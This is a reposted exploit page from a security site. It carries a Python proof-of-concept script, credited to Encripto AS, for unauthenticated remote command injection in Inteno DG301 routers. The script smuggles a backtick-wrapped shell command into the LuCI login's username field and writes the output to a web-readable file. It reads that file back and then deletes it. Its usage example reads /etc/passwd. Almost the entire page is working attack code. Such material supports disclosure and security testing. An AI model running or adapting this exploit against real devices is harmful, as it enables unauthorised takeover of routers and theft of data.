首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Inteno DG301 Remote Command Execution
来源:encripto.no 作者:Guelfo 发布时间:2014-02-10  

#!/usr/bin/python

################################################################
#                                                              #
# Inteno DG301 Command Injection PoC                           #
#                                                              #
# Vulnerable version: Powered by LuCI Trunk (inteno-1.0.34)    #
#                     OpenWrt Backfire 10.03.1-RC6             #
#                                                              #
# Written by Juan J. Guelfo @ Encripto AS                      #
# post@encripto.no                                             #
#                                                              #
# Copyright 2014 Encripto AS. All rights reserved.             #
#                                                              #
# This software is licensed under the FreeBSD license.         #
# http://www.encripto.no/tools/license.php                     #
#                                                              #
################################################################

import sys, getopt, urllib, urllib2


__version__ = "0.1"
__author__ = "Juan J. Guelfo, Encripto AS (post@encripto.no)"


# Prints title and other header info
def header():
 print ""
 print " ================================================================= "
 print "|  Inteno DG301 v1.0.34 Command Injection PoC \t\t\t  |".format(__version__)
 print "|  by {0}\t\t  |".format(__author__)
 print " ================================================================= "
 print ""
   
# Prints help   
def help():
 header()
 print """   Usage: python Inteno-DG301-PoC.py [mandatory options]

   Mandatory options:
       -t target               ...Target IP address
       -p port                 ...Port where the HTTP admin interface is listening on
       -c cmd                  ...Command to inject
       
   Example:
       python Inteno-DG301-PoC.py -t 192.168.1.1 -p 80 -c "cat /etc/passwd"
    """
 sys.exit(0)
   
   
   
if __name__ == '__main__':
   
 #Parse options
 try:
  options, args = getopt.getopt(sys.argv[1:], "t:p:c:", ["target=", "port=", "cmd="])

 except getopt.GetoptError, err:
  header()
  print "\n[-] Error: {0}.\n".format(str(err))
  sys.exit(1)

 if not options:
  help()

 target = None
 port = None
 cmd = None
 reset = None
 for opt, arg in options:
  if opt in ("-t"):
   target = arg
  
  if opt in ("-p"):
   port = arg   
   
  if opt in ("-c"):
   cmd = arg 
   
 #Option input validation
 if not target or not port or not cmd:
  help()
  print "[-] Error: Incorrect syntax.\n"
  sys.exit(1)

 header()
 print "[*] Trying to connect to {0}:{1}...".format(target, port)
 headers = { "User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"}

 try:
  # Inject command
  print "[*] Sending command: {0}".format(cmd)
  data = "username=user`"+ urllib.quote(cmd) + "%20>%20/www/poc.txt`&password=pass"
  r = urllib2.Request("http://%s:%s/cgi-bin/luci" % (target, port), data, headers)
  results = urllib2.urlopen(r).read()
  
  # Retrieve results
  r = urllib2.Request("http://%s:%s/poc.txt" % (target, port), None, headers)
  results = urllib2.urlopen(r).read()
  
  # Show results
  print "[+] Retrieving results...\n"
  print results
  
  # Clean output file
  data = "username=user`rm%20/www/poc.txt`&password=pass"
  r = urllib2.Request("http://%s:%s/cgi-bin/luci" % (target, port), data, headers)
  results = urllib2.urlopen(r).read()
  
  print "[*] Cleaning up...\n"

 except urllib2.URLError:
  print "[-] Error: The connection could not be established.\n"
  
 except IOError as e:
  print "[-] Error: {0}...\n".format(e.strerror)

 sys.exit(0)


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Android Browser and WebView ad
·Pandora FMS Remote Code Execut
·Bandizip 3.09 Crash Proof Of C
·Asseco SEE iBank FX Client 2.0
·Kloxo SQL Injection / Remote C
·OneHTTPD 0.8 - Crash PoC
·Windows TrackPopupMenuEx Win32
·VLC 2.1.2 (.asf) - Crash PoC
·Windows Command Shell Upgrade
·XnView 1.92.1 Command-Line Arg
·KingScada kxClientDownload.ocx
·Apache Struts Developer Mode O
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved